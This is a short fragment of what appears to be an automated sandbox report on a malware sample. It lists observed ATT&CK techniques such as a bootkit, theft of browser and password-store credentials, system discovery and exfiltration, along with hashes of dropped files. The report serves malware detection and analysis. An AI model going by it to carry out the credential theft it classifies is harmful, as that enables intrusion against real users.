T1070.004

Pre-OS Boot

T1542

Bootkit

T1542.003

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\LOGGED.txt

Filesize
21B

MD5
d17922f5accd0340c258fb460e859047

SHA1
2856d994f442f6731df2c7bd5c28d77c4ef9c993

SHA256
c814876c5dea763382185fe48bf14350cbf36401c698cf50d9a91c3cc7144389

SHA512
ca293b91d41efe630ca168e162b5e35c2afaf279e4250435296256d2f1dd309c85f732c46715178848330a69079d7339fa20dd1c3d6e8ed3bf521c7328ea247d

Download Submit
C:\Users\Admin\QFT.bat

Filesize
31B

MD5
92aa8aa5ebf84020e37fd1718ceface0

SHA1
11cfce0a8d4f0c67d87a139735df4104c279e172

SHA256
d9c79c1614f67fd6d9949f7df5a45df7ea127bcbfc1d0a6f7e1eac9bef6b522b

SHA512
e433d3a1e9858d9647f27c8bf5ef77987eceb63c1437b5c423bf03ae1bb94c13c1917cdd368d4f171aa64bb607f171270e0e5879e6c336c7304bd5748ecffd5f

Download Submit
memory/2104-4-0x0000000000400000-0x00000000004D9000-memory.dmp

Filesize
868KB

Download